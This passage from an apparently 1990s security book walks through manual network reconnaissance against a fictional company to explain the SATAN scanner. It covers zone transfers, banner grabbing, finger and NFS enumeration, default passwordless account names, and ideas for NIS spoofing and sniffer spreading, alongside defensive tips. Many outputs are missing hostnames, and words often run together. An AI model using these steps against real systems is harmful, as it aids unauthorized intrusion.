Mailing lists are quite useful, although they can generate quite a bit of uninteresting traffic.The most popular list is bugtraq, which has continuing discussions about new vulnerabilitiesand security topics. The 8lgm list is very useful in learning about new holes and gettingexploitation information, because they frequently post detailed information on vulnerability.The CIAC, CERT, and vendor lists are useful in announcing the availability of new patches toaddress security holes; they rarely announce the presence of holes that are not yet fixed.

Other non-security-related mailing lists that directly address Internet services also frequentlydeal with security. Mailing lists for sendmail, bind, SSL, Kerberos, e-payments, ipk (public keyinfrastructure), ietf-822, drums (e-mail), and IETF working groups all offer useful tidbits,although the volume on each is quite high compared to the number of security-related issues.

The advent of the World Wide Web has resulted in the creation of many Web pages dedicatedto security. Some of the best include the U.S. DOE’s CIAC Web site and the Purdue Univer-sity COAST project site. A list of Web sites is included in Appendix B.

Reverse engineering patches from vendors that have catalog descriptions indicating securityproblems can always be informative. Perhaps the other vendors have yet to fix this problem, orperhaps the other OS platforms are not yet patched?

FTP security archives, such as Wietse Venema’s, CERT’s, andTexas AMU’s, are very useful sources for new programs and papers. A list ofvarious FTP archives is included in Appendix B.

Watch for Linux source code changes on ftp.sunsite.unc or your favorite mirror, becauseLinux is usually at the cutting edge of technology for many Internet services.

Finally, you should look for updates to SATAN itself, in case scans for new vulnerabilities areadded into the base distribution.

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Thinking Like an IntruderSometimes, the best way to learn about new holes is to think like an intruder and analyze asystem from that standpoint. The first phase of a network attack consists of gaining informa-tion about security holes. The previous sections have shown some sample security holes as wellas how to learn about new ones. The next part of this phase is gaining information about thetarget systems. This is best taught by a demonstration, albeit a naive and primitive one.

The creators of SATAN gained notoriety a few years before SATAN’s release when theypublished a paper entitled “Improving the Security of Your Site by Breaking Into It” (Farmer& Venema, 1993). The novel idea was not popular with some system administrators, becausethe paper provided a training manual of sorts for new hackers. Work on the paper led theauthors to create SATAN, so it is appropriate to try to follow the same approach in learningabout SATAN. This approach can be useful in creating policies and configurations thatimprove the security of an organization.

Instead of using a real organization, the example uses a hacker that attempts to gain access toan imaginary company called NotReal Corporation. The hacker’s goal is to break into thecompany’s computer systems and get as much control over their systems as possible. Theassumption is that the hacker has access to a system on the Internet and will mount the attackfrom that location, with no additional access over any other network. The example stepsthrough the general procedure that a non-automated attack would use, so that the automatedapproach used by SATAN is more clear.

Gathering Information on SystemsWhat the hacker would like to do is create a map of all the systems in the company, along withversion numbers of the OS, lists of the usernames, and a list of the network services that arebeing run on those systems.

Getting Hostnames and IP AddressesBy running whois, the hacker can get back either a list of hosts on the notreal.comnetwork or a message about the network. The whois program contacts theInternic and finds matches of names (administrator names, hostnames, network addresses, andso on) from the DNS records kept by the Internic. Sometimes, the whois output contains aprepared message that includes a nicely formatted list of the domain servers along with systemadmin names.

(The new whois++ standards in RFC 1834 and RFC 1835 improves the information availablefrom the Network Information Center that stores the whois database.)

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For example, here is what the hacker might see as a result of doing a whois notreal:

# whois notrealNotreal Corporation (NOTREAL-DOM) NOTREAL.COMNotreal - Bldg 11 (NET-NSOFT-1) NSOFT-1 (NRWORD-DOM) NRWORD.COMNotreal Corporation (NOB3-DOM) NOB.COM...

Now run nslookup:

# nslookup...> set type=any> notreal.comName Server: mylocal.hackersystem.comAddress:

Non-authoritative nameserver = nameserver = preference = 10, mail exchanger = preference = 20, mail exchanger =

Authoritative answers can be found nameserver = nameserver = dns.somebodyelse.COMDNS1.NOTREAL.COM internet address = internet address = internet address = internet address = 123.456.78.9>

The hacker already has a few hosts by using whois and nslookup. The new trick is to pulldown the entire map from the DNS server named, running on system.

DNS uses secondary name servers that regularly transfer the named db files by requesting themfrom the primary name server. Any system can usually request these. (Although the new Bind4.9.x name servers can be configured to restrict the source addresses of requesting systems, fewuse this new configuration option.) The hacker uses the program named-xfer to do exactlythat:

% named-xfer -d -f db.notreal head db.notreal$ORIGIN IN SOA ( 2213 10800 3600 604800 86400 ) IN NS$ORIGIN

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The hacker is now getting a much better picture of the hosts in the domain. He orshe would like to find out how many of these hosts are directly connected to the Internet andhow many are behind a firewall. He or she could do this by trying to ping each host; however,it is best to create a script that would do this, rather than doing it by hand. Even better, thefping command can do this most efficiently and is shipped with SATAN. The hacker canformat the db.notreal file to list out all the hosts in the domain and then havefping try to contact each. This aids the hacker in generating a list of systems directly on theInternet:

% cat fping < is is is is is alive...

The hacker now starts looking at the systems that are connected to the Internet. Ideally, thehacker would like to know the OS type and brand of each system, so that he or she canidentify problems that may exist on those systems.

telnetd InformationThe quickest way to identify the OS type is by attempting to telnet to the systems. The telnetdprovides back a banner line containing this information:

% telnet sys4.notreal.comTrying...Connected to character is ‘^]’.

HP-UX sys4 A.09.04 U 9000/847 (ttyp4)login:

This system is an HP-UX 9.04 OS running on an HP 9000 Series 847.

The banner lines from the telnetd prompt of other systems in’s domain aresummarized here:

sys3.notreal.comDigital UNIX (sys3) (ttyp1)

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This system indicates that the manufacturer is Digital but does not indicate the OS type(Ultrix, OSF/1), version, or hardware platform.

dns1.notreal.comUNIX(r) System V Release 4.0 (dns1)

This system offers very little information. No assumptions can be made of the OS type. Ithappens to come from a Solaris 2.x system, but this banner is no guarantee that the remotesystem is indeed a Solaris 2.x box.

m3.notreal.comIRIX System V.4 (hpcsecf)

This is clearly an SGI IRIX system.

Note While the hacker is telneting to the SGI system, he will try to log in with the accountnames that, by default, have no passwords on SGI systems. These account namesare guest, lp, demos, nuucp, root, tour, tutor, and 4Dgifs. (Actually, many Unixsystems still use the guest login with a guest password.)

m4.notreal.comSunOS UNIX (m4)

This is quite clearly the Sun OS system. It probably is a Sun OS 4.x, but no further details canbe assumed.

sys3.notreal.comAIX Version 4(c)Copyrights by IBM and by others 1982, 1994.

This quite clearly is an IBM AIX 4.0.

Note Even though the banners from telnetd given earlier may be accurate today, patchesand new OS releases may change the content of the information. A true intruderwould first try to build up a database of all possible telnetd banners from as manysystems as possible, to characterize all the possible OS sources of a particularbanner. This is also true for the upcoming ftpd and sendmail banners. SATAN usesthe banner information to quickly identify systems.

Note that a hacker can use a packet sniffer to watch users type their password when logging inusing telnet. If users ever telnet to your system across the Internet, have them change theirpassword as soon as they return to the internal company system. Otherwise, consider usingkerberized telnet, sslized telnet, secure shell (ssh), or one-time passwords. This is also the casefor rlogin, rexec, and FTP.

Also, some telnetds permit the user to pass environment variables to the remote system loginprogram. Some variables can be quite dangerous to pass in. Review which variables are

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acceptable to you, and be sure that your telnetd filters the appropriate ones. See the recentCERT advisory on telnetd for more information (CERT CA:95-14).

ftpd InformationThe ftpd server gives version information in the opening line of its dialog with a client. It alsoallows an unauthorized user to sometimes issue commands, such as system, help, and others.

The hacker tests whether anonymous FTP is available by trying to log in using ftp or anony-mous. If it is available, the hacker then tries to exploit possible problems with ftpd. While onthe system, the hacker downloads every file that is readable, especially the ˜ftp/etc/passwd file.Anonymous FTP is useful in helping the intruder build up a database of information on thetarget system. SATAN gets version information from ftpd and checks if anonymous FTP isavailable.

% ftp m2.notreal.comConnected to m2 FTP server (Digital UNIX Version 5.60) ready.Name (m2:intruder): ftp331 Guest login ok, send ident as password.Password:230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.ftp> system215 UNIX Type: L8 Version: OSF/1ftp> help

Notice that ftpd will respond to the help command with a list of supported commands on thissystem. Many Internet services, such as ftpd or sendmail, offer help in response to a helpcommand. Gathering information on what functionality is available from remote services is thegoal, and the help command is useful in achieving this goal. The following shows a list ofcommands offered by the preceding ftpd:

! delete mget quit status$ dir mkdir quote structaccount disconnect mls recv suniqueappend form mode reget systemascii get modtime rename tenexbell glob mput reset tracebinary hash newer restart typebye help nlist rhelp umaskcase idle nmap rmdir usercd image ntrans rstatus verbosecdup lcd open runique ?chmod ls prompt sendclose macdef proxy sendportcr mdelete put sitedebug mdir pwd size

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The m2 is a Digital Unix system, running OSF/1. The ftpd on Ultrix gives back a similarmessage but actually says Ultrix. The help command provides the hacker with a number ofuseful tidbits: the site command is available, as are proxy, quote, system, sendport, and otheruseful commands. Most ftpd binaries offer a similar list of supported commands in response toa help request.

% ftp dns1.notreal.comConnected to dns1 FTP server (UNIX(r) System V Release 4.0) ready.Name (dns1:intruder): ftp530 User ftp unknown.Login failed.ftp> system500 ‘SYST’: command not understood.ftp>

The hacker gets no information from the ftp prompt and no information from the systemprompt. The preceding prompt came from a Solaris 2.4 system, but such a prompt is noguarantee that the system is a Solaris 2.4 system. For the sake of brevity, the subsequent ftptransactions have been edited to remove redundant information such as username andpassword prompts.

% ftp m3.notreal.comConnected to m3 FTP server ready.ftp> system215 UNIX Type: L8 Version: SVR4

This system gives the hacker no information at all, other than SVR4 as a system type. Thiscame from an SGI IRIX system, but there is no way to tell that for sure from this prompt.

% ftp m4.notreal.comConnected to m4 FTP server (SunOS 4.1) ready.

This is a Sun OS 4.1 system. The hacker does not need to use the system command. (Itactually does not allow a system command.)

% ftp mail.notreal.com220 mail FTP server (Version wu-2.4(10) Mon Nov 21 17:34:06 PST 1994) ready.

This one is interesting. It is running the wu-ftpd, the leading ftpd implementation. Thispopular ftpd offers extensive functionality. An older version of wu-ftpd had a security holewith the SITE EXEC protocol statements, discussed later in this chapter, that is checked for bySATAN. Unfortunately, wu-ftpd gives no information on the system type.

% ftp sys3.notreal.com220 sys3 FTP server (Version 4.1 Sat Aug 27 17:18:21 CDT 1994) ready.ftp> system215 UNIX Type: L8 Version: BSD-44

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The Version 4.1 is an IBM AIX version number; however, the BSD-44 does not guarantee thatthe system is an IBM AIX source, because others could give this same answer.

% ftp sys4.notreal.comConnected to sys4 FTP server (Version Thu Jul 22 18:32:22 GMT 1993) ready.ftp> system215 UNIX Type: L8

This system gives no information at all; it came from an HP-UX 9.x workstation. The onlything that might give it away is the version number, but this is no certainty, because otherversions of Unix might put a similar RCS type number in the Version banner.

sendmail InformationBy talking directly to the SMTP port, TCP port number 25, a hacker can ask the SMTPdaemon, almost always sendmail, to provide information on the remote system and on itself.sendmail is a great source of security holes, because it typically runs set-uid to root, consists oftens of thousands of lines of C code, has a large and complex configuration file that is custom-ized by every user, and is run on every host that acts as a transport agent for e-mail on theInternet. Non-Unix systems such as Macs or PCs that want to send Internet e-mail willtypically make a direct connection to a Unix system running sendmail. The Macs or PCs donot typically act as mail transport agents on the Internet.

The hacker would like to get information on the host OS and the version of sendmail. Hecould also use EXPN (expand), HELP, and VRFY to identify information such as the identityof the postmaster (a requirement for all mail hosts), root, guest, webmaster, ftp, uucp, lp, andwww. The hacker is quite interested in finding mail expansions that indicate programs, files, ormailing lists.

If sendmail is configured to permit EXPN, the sendmail aliases file is read and the expansioncorresponding to the entry is returned. If only VRFY is permitted, the hacker can still verifythe existence of accounts in the /etc/passwd file. A utility program, expand_alias, is availablethat can automate expansion searches.

For an example, here is what the hacker sees when interrogating sendmail on the systems

% telnet 25220 Sendmail 5.0/SMI-SVR4 ready at Sat, 11 Nov 95 19:47:37 PST

Note sendmail typically reports back the version of the binary as the first field after thename sendmail in the initial banner, followed by a / and the version of the configu-ration file. This is configurable via the file and may differ on somemachines.

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The sendmail binary appears to have a 5.0 version, and the config file has an SMI-SVR4version. The SMI stands for Sun Microsystems Inc., and 5.0 stands for the Sun OS 5.0 orSolaris 2.0 system.

% telnet 25Connected to m2 Sendmail 5.65v3.2 ( Sat, 11 Nov 1995 20:04:27

The binary says 5.65v3.2, which indicates that it is version 5.65 of sendmail. The 3.2 appearsto hint that this is an IBM AIX system, but this is really not the case. Recall from the ftpdbanner that this system is a DEC OSF/1 box. Notice that the config file version information isseparated by a space and surrounded by parentheses. It appears to be an RCS version number.This could be useful when reverse-engineering patches that included security fixes.

% telnet 25220 Sendmail 931110.SGI/930416.SGI ready at Sat, 11 Nov 9519:54:12 -0800

This is clearly the SGI system. Notice the dates of the sendmail binary (931110.SGI) andsendmail config file (930416.SGI). This is useful if a hacker finds that a sendmail security holeoccurred after the given date in the header string. Luckily for this intruder, there have beenseveral sendmail holes since November 93. A hacker can find details on that by studying theCHANGES file for the latest sendmail available from UCB.

% telnet 25220 m5. Sendmail 4.1/SMI-4.1 ready at Sat, 11 Nov 95 19:53:48 PST

SMI tells you that this is a Sun OS, and 4.1 indicates the version of the Sun OS. There is noinformation on the version of sendmail, although you can make assumptions based on the OSversion.

% telnet 25220 Sendmail AIX 4.1/UCB 5.64/4.03 ready at Sat, 11 Nov 199520:22:55 -0800

This banner is quite clear about the OS version (IBM AIX 4.1) and the sendmail version(5.64). This is quite useful.

% telnet 25220 ESMTP Sendmail 8.7/8.7; Sat, 11 Nov 1995 20:05:52 -0800 (PST)

This system is running the latest version of sendmail from the UCB distribution.

% telnet 25220 HP Sendmail ( ready at Sat, 11 Nov 199521:36:36 -0800

This system clearly announces that it is an HP (HP-UX) system. Although the ftpd on HP-UXdid not announce the OS type, the sendmail daemon does. No real information on the versionof the daemon, though.

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Note The amount of information gained by interrogating each network daemon on thetarget systems can easily overwhelm an intruder. A nice report and summary toolcould be quite useful, and SATAN provides this. In the absence of such a tool,perhaps a spreadsheet or custom database could help maintain the information.

The list of sendmail holes is quite lengthy; however, the latest sendmail (currently 8.7.2) nearly always has patches for all known holes.Running that sendmail, or making sure your vendor has all patches that this version contains,can make your system as safe as it can be. Using smrsh and a small list of permissible programscan also improve your sendmail security, as can disabling VRFY and EXPN, although this doesremove some of the usefulness of the e-mail infrastructure.

UDP/TCP ScanThe hacker now wants to gain information about the remote system’s /etc/inetd.conf file,which contains a list of services offered by inetd. SATAN includes programs that attempt toconnect to each UDP and TCP port. The hacker can write similar socket programs to do this,but it is, once again, much easier to use SATAN.

The Internet operates under the assumption of well-known ports, as described in RFC 1700“Assigned Numbers.” The /etc/services file provides a list that can be used to make assump-tions on the service listening to the port that accepted a connect during the scan.

For TCP, telnet can be used to try a connect to a particular port. For example:

% more /etc/services# This file associates official service names and aliases with# the port number and protocol the services use.# The form for each entry is:# <official service name> <port number/protocol name> <aliases>echo 7/tcp # Echoecho 7/udp #discard 9/tcp sink null # Discarddiscard 9/udp sink null #systat 11/tcp users # Active Usersdaytime 13/tcp # Daytimedaytime 13/udp #...% telnet dns1 echoTrying...Connected to character is ‘^]’.oneone...% telnet sys3 echoTrying...

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telnet: Unable to connect to remote host: Connection refused% telnet dns1 13Trying...Connected to character is ‘^]’.Sat Nov 11 22:22:34 1995Connection closed by foreign host.%

Here the hacker finds that sys3 does not offer the echo service, whereas dns1 does offer it, aswell as the daytime (TCP/13) service.

For manual TCP scans, a hacker can use telnet or the SATAN TCP scanner. For UDP scans,the hacker must make a program or use the SATAN UDP scanner. Other port scanners areavailable at FTP archives such as COAST.

Tip You can use TCP wrappers to prevent unauthorized remote systems from success-fully making TCP or UDP connections to local services. Wietse Venema’stcp_wrappers is one of the most popular such programs, although several vendorsinclude similar functionality into inetd, via inetd.sec or xinetd. Xinetd also offers agood deal of flexibility in controlling services and minimizing risks.

At this point, the hacker has spent quite a bit of time manually interrogating ftpd, sendmail,and telnetd to gather information on the remote system from banner comments. The hackerhas also gained information on which services are offered on the remote system. A manual scanfor this information can take ten minutes per host. The hacker can use SATAN to scanhundreds of hosts for this information in a few seconds. Not only will SATAN do the scan,SATAN will generate summary reports, and build a database of discovered systems that can beautomatically scanned. Although manual scans, as demonstrated in this section, are useful forunderstanding and expanding SATAN, they are quite slow and inefficient.

Portmap InformationInternet network services are offered primarily through three mechanisms: network daemonsthat constantly listen to a port, network daemons that use inetd to listen to a port and areinvoked when a connection request is caught by inetd, and rpc services that use the portmapprogram to dynamically assign a port in response to a request for that particular program. Themost popular rpc services are NIS and NFS, both of which offer much to the intruder.

The rpcinfo program interrogates a remote portmap program and indicates what services areavailable. A hacker looking at the systems would see something such as this (forbrevity’s sake, TCP versions have been deleted):

% rpcinfo -p program vers proto port 100000 2 udp 111 portmapper

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100007 2 udp 877 ypbind 100005 3 udp 1027 mountd 100003 3 udp 2049 nfs 100024 1 udp 1028 status 100021 4 udp 1031 nlockmgr 100020 3 udp 1033 llockmgr 100011 1 udp 1036 rquotad 100017 1 tcp 1025 rexd 100001 3 udp 1029 rstatd 100002 2 udp 1031 rusersd 100008 1 udp 1033 walld 100012 1 udp 1036 sprayd 150001 2 udp 1038 pcnfsd 100026 1 udp 1036 bootparam 100028 1 tcp 1094 ypupdated 100004 2 udp 716 ypserv 100009 1 udp 1023 yppasswdd

The interesting services to note are nfs, ypbind, ypserv, ruserd, bootparam, mountd, and rexd.The others are useful too, so the hacker records all this information into an ever-expandingdatabase. SATAN scans the list of services offered by the portmap program and specificallylooks for the presence of nfs/mountd, yp/NIS, and rexd. All three of these services have beenassociated with security holes. Note that some portmaps permit remote unregistration andregistration of programs, allowing a remote hacker to modify the portmap database. The newerversion of portmap is called rpcbind; it still features the same issues.

Tip A secure portmap program and rpcbind are available from Wietse Venema, one ofthe creators of SATAN and the creator of tcp-wrapper. A system admin can config-ure this portmap to respond only to requests from authorized network addresses.Although this can be circumvented using IP spoofing, it does improve security. Thisprogram also includes several security improvements such as the elimination ofrequest forwarding.

Boot InformationIf SATAN discovers that a system’s portmap program offers the bootparam service, SATANwill scan that service and learn the NIS domain name. SATAN focuses on the first phase of anetwork attack, gaining remote access, and does not try to interrogate the bootpd server;however, the bootpd server offers an intruder an excellent way to carry out phase three of anattack. If the intruder has gained root access to a system, the intruder can exploit vulnerabili-ties offered by bootpd. SATAN will list the systems running bootpd, and the vigilant intruderwill try to attack these systems once he or she has gained access to any system on the sameLAN segment.

After the hacker has gained access to a system on the same LAN segment as the bootpd server,the hacker can identify the LAN addresses of the remote server by first pinging it. The pingcauses the compromised system to generate an ARP request packet that the remote server

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responds to with a packet containing its LAN address. The hacker then dumps the arp cache ofthe compromised system. This requires the hacker to be on the same LAN segment, or else theLAN address is just that of the nearest router. Once again, SATAN is useful in the first phaseof an attack, when trying to gain initial access to a remote system. This discussion of bootpd isrelated the third phase of an attack: extended access by using additional vulnerabilities, in thiscase vulnerabilities only available to systems on the same LAN.

Of course, if the hacker is on the same LAN segment, the hacker can spoof the arp requestsand impersonate hosts, a major vulnerability. Therefore, a more realistic attack might comefrom a brute force sequencing through all the possible LAN addresses. The first three parts ofthe LAN address are fixed by the manufacturer and are widely available. The last three partsvary by system, offering a total of 255×255×255 = 16 million combinations. A real attackcould generate 16 million bootpc request packets; perhaps they would start the attack on aFriday evening and run it until they got lucky. Some intelligent sequencing may even bepossible. A hacker could try to map a pattern of the LAN address scheme on a vendor’s systemversus the system and shipment date and then use previously gained information to narrow thesearch space.

Assuming that the hacker is able to get the LAN address, the hacker can now get informationon the boot file that the bootpd (dhcp) server offers to boot clients. (Note that some Unixsystems, notably Sun, use the rpc bootparam method for providing this information, ratherthan a bootpd server.) Here is an example of being on the same LAN and using ping to grabthe LAN address:

% ping sys4.notreal.comPING 64 byte packets64 bytes from icmp_seq=0. time=2. ms% arp ( at 8:0:9:01:23:45 ether% bootpquery 080009012345Received BOOTREPLY from (

Hardware Address: 08:00:09:01:23:45Hardware Type: ethernetIP Address: file: /usr/lib/uxbootlf.700

RFC 1048 Vendor Information: Subnet Mask: Gateway: Domain Name Server: Host Name: sys4%

The bootpquery program is a simple HP-UX program that generates a bootp request andformats the reply. A comparable program is easy enough to generate on other Unix systems.

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The information returned by bootpd is quite useful. The bootp packets contain IP andhostname information about systems that boot their kernels over a network connection to aserver. The bootp packets also indicate a boot server system that supplies boot files and bootconfiguration information to client systems that boot over the network. An intruder can try tocorrupt boot data on the server or try to masquerade as a boot server to the client.

If the remote systems are using the rpc bootparam method instead of the bootpd method, thehacker can get the information via the portmap program on the systems that showedbootparam on the rpcinfo -p list.

By crafting an rpc program that does a callrpc() for BOOTPARAMPROC_WHOAMI, thehacker can get the same information, as well as the NIS domain of the systems, which can thenbe used to request NIS maps, such as passwd, from the ypserv program. A program calledbootparam that gets such information is included as part of SATAN.

Tip A system administrator should never permit a boot server to be available for Internetaccess. The firewalls should be configured to screen out packets on the bootp (67/UDP, 68/UDP, 1067/UDP, 1068/UDP) and portmap ports (111/UDP, 111/TCP).

finger, rusers, and rwhoSome consider the finger program to be one of the most dangerous tools for informationleakage. Although it provides useful information for monitoring remote hosts, it provides evenmore useful information for hackers who are trying to build up databases of information aboutthe target systems. A comparable rpc program, rusers, is frequently available even when fingerdis not. A third program, rwho, also provides similar information.

First, the hacker uses finger @<systemname> to get a list of users who are currently logged on.Then the hacker tries using login names at each system, such as root, bin, guest, ftp, tftp,daemon, sync, and usernames that the hacker has already discovered. This should result in abonanza of information for the hacker’s growing database:

% finger[]Login Name TTY Idle When Officeroot system PRIVILEGED ac *:0 Fri 11:41root system PRIVILEGED ac p2 8d Fri 11:56bkelley Bob Kelley p4 5d Tue 15:14 Bldg 52 X71111% finger [emailprotected][[emailprotected]]Login name: root (messages off) In real life: system PRIVILEGEDaccountOffice: Bldg 43, x71111Directory: / Shell: /bin/shOn since Oct 27 11:41:13 on :0On since Oct 27 11:56:39 8 days Idle Time on ttyp2

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On since Nov 3 13:46:00 8 days Idle Time on ttypa from m4On since Nov 3 15:52:41 8 days Idle Time on ttypb from m3% finger [emailprotected][]Login name: xxftp In real life: anonymous ftpDirectory: /users/ftp Shell: /bin/falseNever logged in.No Plan.% finger [emailprotected][]Login name: bin In real life: System Tools OwnerDirectory: /bin Shell: /dev/nullNever logged in.No Plan.% finger [emailprotected][]Login name: guest In real life: Guest AccountDirectory: /usr/people/guest Shell: /bin/cshLast login at Wed Jul 12 17:39 from [emailprotected] Plan.

A hacker uses finger to build up a copy of the /etc/passwd file, with new information on loginnames, home directories, login shells, last login information (tty, system used to login from,and date last logged in), and even information about the individual (phone, address, and soon). This information can be useful as vulnerabilities are discovered. If the hacker discoversthat /usr is NFS exported, for example, the hacker would like to know any users that have ahome directory in /usr (such as guest above). This would permit the hacker to launch .rhosts-type attacks against this user.

Tip Avoid enabling fingerd in inetd. The tcp-wrapper can restrict remote access tofingerd if finger information is absolutely necessary for the network.

The rpc equivalent of fingerd is rusersd. If the remote system indicates through the rpcinfo -pprintout that rusersd is a registered rpc service, running rusers -l <remote system> generates a listcomparable to that generated by finger @<remote system>. The output is very similar to who orrwho. rusers does not allow a query for information about an individual user. SATAN usesrusers to gather information about remote systems:

% rusers -l mail.notreal.combkelley mail:ttys0 Oct 04 12:23 115:28 ( mail:ttys2 Oct 25 14:53 607:20 ( mail:ttys3 Oct 06 08:16 473:41 ( mail:ttys7 Sep 22 10:03 126:18 ( mail:ttys9 Oct 16 15:42 447:27 ( mail:ttysb Oct 10 08:27 65:27 (

The third program, rwho, depends on a daemon called rwhod that does periodic networkbroadcasts of who is on a system to other rwhod programs. This is not very useful for hacking

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because a hacker cannot directly interrogate the rwhod, but he must run a rwhod to listen tobroadcasts. Because the broadcasts don’t go past the local LAN segment, the hacker never seesan update.

Note A number of Web sites that feature username searches are available from the YahooWhite Pages Web page at

NFS Export InformationFor those systems that indicate a mount service via the rpcinfo -p list, the showmount programcan interrogate rpc.mountd for details. The showmount -a command prints out a list of whichhosts have mounted the exported file systems. The showmount -e command requests a list offile systems that are exported via NFS as well as the authorization list for those file systems:

% showmount -e dns1.notreal.comexport list for sys2,sys3/usr (everyone)/export/home (everyone)/var (everyone)/cdrom (everyone)/ m2% showmount -a

Because NFS depends on client-side authentication, a hacker can use one of the many NFShacking tools, such as nfsbug, nfsshell, or nfsmenu, to gain read and write access to theexported file systems. SATAN scans for unrestricted NFS access and indicates this as apotential problem in its reports.

An analysis of the exported file system can offer some insights at vulnerable points. The/cdrom file system is probably acceptable, because it is read-only, as long as the cdrom does notcontain private information. The /tmp file system is also probably acceptable, because of theinherent understanding by most users and programs of the lack of security.

The /usr directory is probably acceptable if it is exported read-only, because it usually containsbinaries. However, many programs depend on /usr/tmp, increasing the likelihood of thisdirectory being writeable. If the directory is writeable and binaries are owned by non-rootusers, the integrity of the binaries is at risk.

/export/home is probably a directory of user home directories that are exported with read andwrite permissions. This is a major vulnerability if the system permits .rhosts files, .Xauthorityfiles, or .netrc files for FTP logins.

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By gaining access to the /var/yp directory of a system that is a yp/NIS server, as indicated bythe portmap information, you can determine the domain name for yp/NIS. The domain nameis the name of the subdirectory of /var/yp. If you have write access to that system via NFS, youcan rewrite the passwd map files and distribute them to all the yp/NIS clients in the domain.

Tip NFS should never be accessible to the Internet. When used, it should be read-only ifpossible. It should never permit root access with write capability. Hackers can copewith only so much laughter.

NIS InformationAn NIS server (ypserv) distributes maps on major system files to all systems inside an NIS/ypdomain. These maps include passwd, hosts, aliases, services, and others. The NIS servertransfers a map to any ypbind client that knows the domain name. There are several ways toget the NIS domain name: the bootparam method (mentioned previously and used bySATAN), the NFS server method (also mentioned previously), and intelligent guessing (alsoused by SATAN). The domain name is frequently something descriptive and easy-to-remember, to help internal users. For example, notreal might be a good guess for the NISdomain for The ypx program can help guess a domain name and transfer an NISmap from the NIS server.

Of course, the hacker could always busy the NIS server with a denial of service type of attack(hundreds of FTP, telnet, or smtp requests), causing the response time to an NIS client’srequest to be slow enough to cause the NIS client to broadcast a request for a new NIS serverto bind to. The hacker could then answer this request and have the client bind to the hacker’ssystem, and distribute the passwd map to this client. At this point, the hacker has control overthe target system.

Tip NIS should never be accessible to the Internet and should not be used in a poten-tially hostile environment. NIS domain names should be quite cryptic andunguessable. NIS+ tries to address many of these issues and should be consideredas a replacement.

Web Server InformationSATAN, as currently distributed, does not include any scans for Web server vulnerabilities.Although the only Web server vulnerabilities discovered have been related to the https (SSLversion of http) services, the dynamic growth of Web server functionality will certainly lead tovulnerabilities. A system administrator can easily add scans for these yet-to-be-discoveredvulnerabilities to SATAN; an example of adding scans to SATAN is included at the end of thischapter.

Even though there are no current Web server vulnerabilities, Web servers are a source ofinformation leakage. Although no indirect information leakage occurs via the httpd on the

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remote systems, the direct, or intended, information leakage from Web pages can be useful. Byusing a Web browser, a hacker can find information about users and systems in the remotenetwork. It is possible to make an automated program that would recursively interrogate thehttp port (TCP/80), doing GET <page> where <page> is /index.html or similar Web pagepaths, scanning the pages for addresses with the domain (PERL would seem idealfor this task.) A comparable scanner for the https (a cryptographically secure version of httpthat uses SSL, usually on TCP/443) could be constructed using either sslref2.0 or SSLeay.(See the section on SSL for details.) SATAN could easily be modified to support such Webscanners.

By creating a Web site and having members of connect to it, a hacker can gaininformation about the client systems. Some Web browsers will send information about thelocal environment and URLs. Of course, such an approach can be extended to makingcorrupted binaries, Java pages, PostScript documents, or e-mail messages. This is moving frompassive information gathering to active deception, but a malevolent intruder is not troubled bythis.

Note A useful Web site for looking up user e-mail addresses is By specifying the first and last name of a person, the remote system searchesa database built up from network news posts.

NNTP InformationSATAN does not scan for information available through network news. NNTP really is auseful source of gaining hostname information, however. It is possible to scan every posting tonetwork news for addresses ending in These could be part of e-mail addresses ofthe posters from within, or part of messages posted by users. In eithercase, such postings provide another source of information leakage regarding’ssystems and users.

The nntpd has the potential for attacks, similar to smtp, but is protected to a certain extent bybeing able to select which hosts can connect to it. Having embedded MIME statements innews postings can be a hidden danger if the newsreader, such as tin or Netscape, can interpretthem. For example, if you have a MIME statement that does an external FTP for the .rhostsfile, this could open your system to a trust attack.

Routing InformationThe gated routing program broadcasts routing tables to other routing daemons. These packetscan be used to build up a picture of the routing tables (netstat -r) on each of the systems They also help to add hostnames to the list of systems in that domain. Knowingthat gated is running can be useful because this program is vulnerable to trusting routingpackets from unauthenticated sources. SATAN indicates whether or not a system is runninggated.

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identd InformationSATAN’s TCP scan discovers whether or not a system is running an identd server, such aspidentd. Programs such as idlookup enable you to determine information about the originatorof a network connection to your system. If the originator of the connection is on a system thatruns pidentd, information about the system type, the local nationalization variables, and userare available. If you can get a user to connect (by sending mail to you, ftping to you, or using aWeb browser to connect to your Web site), you can use idlookup to gain this information.

By using IP spoofing and source routing, a hacker can masquerade as a host that has a currentopen connection and do a brute force search for user information.

If a hacker knows that a large server is accessed by a client at a certain IP address, for example,the hacker can do multiple connects to the auth port on the large server, masquerading as theclient (perhaps using the FTP server bounce vulnerability), indicating the shell or login ports asdestination ports on the server, and scanning all possible ports on the client. Each successfulmatch would provide the hacker with the login name of a user who is using either remsh (rsh)or rlogin to gain access to the server. These users would be possible victims for an .rhostsattack.

Packet SniffingAlthough packet sniffing is more closely related to the third phase of a network attack, andSATAN deals mainly with detecting first phase vulnerabilities, packet sniffing is still one of themost commonly used Internet attacks.

If a hacker can put a packet sniffer on major routes across the Internet, the hacker could usefiltering rules to watch for connections going into or out of Then any connectionfor FTP, telnet, rlogin, or SMTP would permit the hacker to catch a password or otherinformation. Capturing X authority information, NIS maps, or DNS maps can also be quiteuseful.

By widely distributing packet sniffers to many locations, perhaps by surreptitiously placingthem onto sites with minimal security, the odds of catching such connections increase. Evenif the hacker sees only a password for a user on an outgoing connection, a login/passwordcombination is useful knowledge because most users use only a limited number of differentpasswords. In addition, cracking the account of that user on a remote system would perhapspermit the hacker to leverage that intrusion to gain access to

The tcpdump program is a packet sniffer that uses streams dlpi to monitor all traffic goingacross a system’s network interface. It could be used to provide an example of how to embed apacket sniffer into another program in a virus type format. This program could then bedistributed, and when run on the unsuspecting victim’s system, it would capture informationand retransmit it to the intruder’s system.

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Note tcpdump and libpcap are available from the CIAC archives at These programs use the /dev/nit device or the streams dlpi interfaceto put the network interface into promiscuous mode. When tcpdump is run, it printsout the contents of each packet that passes by the network interface. Command-linefilters allow tcpdump to just watch for mail, telnet, transfer to certain hosts, or otherselection criteria. libpcap offers a library of routines that monitor LAN traffic. Not allnetwork interfaces support the promiscuous mode, so check with your vendor first.

IP Layer InformationA hacker would like to know if the target systems permit IP source routing and IP forwarding.These two features can be quite useful. The traceroute program is a useful vehicle for this;using the -g option for loose source routing, or by modifying it for full source routing, theintruder can source route a packet to the target and attempt to get a reply. Unfortunately,SATAN does not scan for this functionality.

